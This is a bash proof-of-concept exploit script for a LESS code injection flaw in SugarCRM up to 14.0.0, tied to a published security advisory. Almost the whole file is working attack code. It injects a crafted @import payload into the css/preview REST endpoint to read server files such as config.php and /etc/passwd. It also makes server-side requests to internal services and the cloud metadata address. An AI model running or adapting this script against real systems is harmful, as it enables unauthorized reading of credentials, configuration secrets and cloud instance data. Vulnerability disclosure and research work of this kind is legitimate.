#!/bin/bash
#
# ------------------------------------------------------------------
# SugarCRM <= 14.0.0 (css/preview) LESS Code Injection Vulnerability
# ------------------------------------------------------------------
#    
# author..............: Egidio Romano aka EgiX
# mail................: n0b0d13s[at]gmail[dot]com
# software link.......: https://www.sugarcrm.com
#    
# +-------------------------------------------------------------------------+
# | This proof of concept code was written for educational purpose only.    |
# | Use it at your own risk. Author will be not responsible for any damage. |
# +-------------------------------------------------------------------------+
#    
# [-] Original Advisory:
#
# https://karmainsecurity.com/KIS-2025-04

echo
echo "+----------------------------------------------------------------------+";
echo "| SugarCRM <= 14.0.0 (css/preview) LESS Code Injection Exploit by EgiX |";
echo "+----------------------------------------------------------------------+";

if [ "$#" -ne 2 ]; then
    echo -ne "\nUsage.....: $0 <SugarCRM URL> <Local File or SSRF URL>\n"
    echo -ne "\nExample...: $0 'http://localhost/sugarcrm/' 'config.php'"
    echo -ne "\nExample...: $0 'http://localhost/sugarcrm/' '/etc/passwd'"
    echo -ne "\nExample...: $0 'https://www.sugarcrm.com/' 'http://localhost:9200/_search'"
    echo -ne "\nExample...: $0 'https://www.sugarcrm.com/' 'http://169.254.169.254/latest/meta-data/'\n\n"
    exit 1
fi

urlencode() {
    echo -n "$1" | xxd -p | tr -d '\n' | sed 's/../%&/g'
}

INJECTION=$(urlencode "1; @import (inline) '$2'; @import (inline) 'data:text/plain,________';//")
RESPONSE=$(curl -ks "${1}rest/v10/css/preview?baseUrl=1&param=${INJECTION}")

if echo "$RESPONSE" | grep -q "________"; then
    echo -e "\nOutput for '$2':\n"
    echo "$RESPONSE" | sed '/________/q' | grep -v '________'
    echo
else
    echo -e "\nError: exploit failed!\n"
    exit 2
fi